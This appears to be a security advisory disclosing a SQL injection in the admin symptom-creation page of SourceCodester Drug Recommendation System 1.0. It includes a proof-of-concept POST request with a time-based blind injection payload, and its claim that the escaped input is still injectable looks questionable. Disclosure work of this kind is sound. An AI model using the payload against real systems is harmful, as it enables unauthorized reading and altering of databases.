DescriptionA SQL injection vulnerability exists in SourceCodester Drug Recommendation System 1.0 in Admin/add_symptom.php. The POST parameter txtname is processed with mysqli_real_escape_string() but still concatenated directly into SELECT and INSERT queries without parameterized binding. Vulnerable queries: SELECT * FROM symptoms WHERE name = '$name' INSERT INTO symptoms (name) VALUES ('$name') Proof of Concept (authenticated): POST /Admin/add_symptom.php Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=<valid> btnadd=1&txtname=test' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- - Impact: An authenticated attacker can inject SQL through the symptom creation form, extracting or modifying database contents. CWE-89, CVSS v3.1 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
